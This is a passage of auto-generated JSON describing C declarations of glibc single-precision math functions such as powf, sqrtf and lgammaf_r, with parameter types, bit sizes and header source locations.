"tag": "parameter", "name": "__iptr", "type": { "tag": ":pointer", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } } }], "return-type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "__modff", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:110:1 <Spelling=<scratch space>:211:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__iptr", "type": { "tag": ":pointer", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } } }], "return-type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "expm1f", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:119:1 <Spelling=<scratch space>:213:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "__expm1f", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:119:1 <Spelling=<scratch space>:215:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "log1pf", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:122:1 <Spelling=<scratch space>:216:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "__log1pf", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:122:1 <Spelling=<scratch space>:218:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "logbf", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:125:1 <Spelling=<scratch space>:219:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "__logbf", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:125:1 <Spelling=<scratch space>:221:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "exp2f", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:130:1 <Spelling=<scratch space>:222:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "__exp2f", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:130:1 <Spelling=<scratch space>:224:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "log2f", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:133:1 <Spelling=<scratch space>:225:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "__log2f", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:133:1 <Spelling=<scratch space>:227:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "powf", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:140:1 <Spelling=<scratch space>:230:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__y", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "__powf", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:140:1 <Spelling=<scratch space>:232:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__y", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "sqrtf", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:143:1 <Spelling=<scratch space>:233:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "__sqrtf", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:143:1 <Spelling=<scratch space>:235:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "hypotf", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:147:1 <Spelling=<scratch space>:236:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__y", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "__hypotf", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:147:1 <Spelling=<scratch space>:238:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__y", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "cbrtf", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:152:1 <Spelling=<scratch space>:239:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "__cbrtf", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:152:1 <Spelling=<scratch space>:241:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "ceilf", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:159:1 <Spelling=<scratch space>:242:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "__ceilf", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:159:1 <Spelling=<scratch space>:244:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "fabsf", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:162:1 <Spelling=<scratch space>:245:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "__fabsf", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:162:1 <Spelling=<scratch space>:247:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "floorf", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:165:1 <Spelling=<scratch space>:248:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "__floorf", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:165:1 <Spelling=<scratch space>:250:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "fmodf", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:168:1 <Spelling=<scratch space>:251:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__y", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "__fmodf", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:168:1 <Spelling=<scratch space>:253:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__y", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "isinff", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:177:1 <Spelling=<scratch space>:254:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__value", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "finitef", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:182:1 <Spelling=<scratch space>:255:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__value", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "dremf", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:185:1 <Spelling=<scratch space>:256:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__y", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "__dremf", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:185:1 <Spelling=<scratch space>:258:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__y", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "significandf", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:189:1 <Spelling=<scratch space>:259:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "__significandf", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:189:1 <Spelling=<scratch space>:261:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "copysignf", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:196:1 <Spelling=<scratch space>:262:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__y", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "__copysignf", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:196:1 <Spelling=<scratch space>:264:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__y", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "nanf", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:201:1 <Spelling=<scratch space>:265:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__tagb", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "__nanf", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:201:1 <Spelling=<scratch space>:267:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__tagb", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "isnanf", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:211:1 <Spelling=<scratch space>:268:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__value", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "j0f", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:217:1 <Spelling=<scratch space>:269:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "__j0f", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:217:1 <Spelling=<scratch space>:271:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "j1f", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:218:1 <Spelling=<scratch space>:272:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "__j1f", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:218:1 <Spelling=<scratch space>:274:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "jnf", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:219:1 <Spelling=<scratch space>:275:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "__jnf", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:219:1 <Spelling=<scratch space>:277:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "y0f", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:220:1 <Spelling=<scratch space>:278:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "__y0f", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:220:1 <Spelling=<scratch space>:280:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "y1f", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:221:1 <Spelling=<scratch space>:281:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "__y1f", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:221:1 <Spelling=<scratch space>:283:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "ynf", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:222:1 <Spelling=<scratch space>:284:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "__ynf", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:222:1 <Spelling=<scratch space>:286:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "erff", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:228:1 <Spelling=<scratch space>:287:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "__erff", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:228:1 <Spelling=<scratch space>:289:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "erfcf", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:229:1 <Spelling=<scratch space>:290:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "__erfcf", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:229:1 <Spelling=<scratch space>:292:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "lgammaf", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:230:1 <Spelling=<scratch space>:293:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "__lgammaf", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:230:1 <Spelling=<scratch space>:295:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "tgammaf", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:235:1 <Spelling=<scratch space>:296:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "__tgammaf", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:235:1 <Spelling=<scratch space>:298:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "gammaf", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:241:1 <Spelling=<scratch space>:299:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "__gammaf", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:241:1 <Spelling=<scratch space>:301:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "lgammaf_r", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:249:1 <Spelling=<scratch space>:303:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__signgamp", "type": { "tag": ":pointer", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } } }], "return-type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "__lgammaf_r", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:249:1 <Spelling=<scratch space>:306:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__signgamp", "type": { "tag": ":pointer", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } } }], "return-type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "rintf", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:256:1 <Spelling=<scratch space>:307:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "__rintf", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:256:1 <Spelling=<scratch space>:309:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "nextafterf", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:259:1 <Spelling=<scratch space>:310:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__y", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "__nextafterf", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:259:1 <Spelling=<scratch space>:312:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__y", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "nexttowardf", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:261:1 <Spelling=<scratch space>:313:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__y", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }], "return-type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "__nexttowardf", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:261:1 <Spelling=<scratch space>:315:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__y", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }], "return-type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "remainderf", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:272:1 <Spelling=<scratch space>:317:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__y", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "__remainderf", "ns": 0, "location": 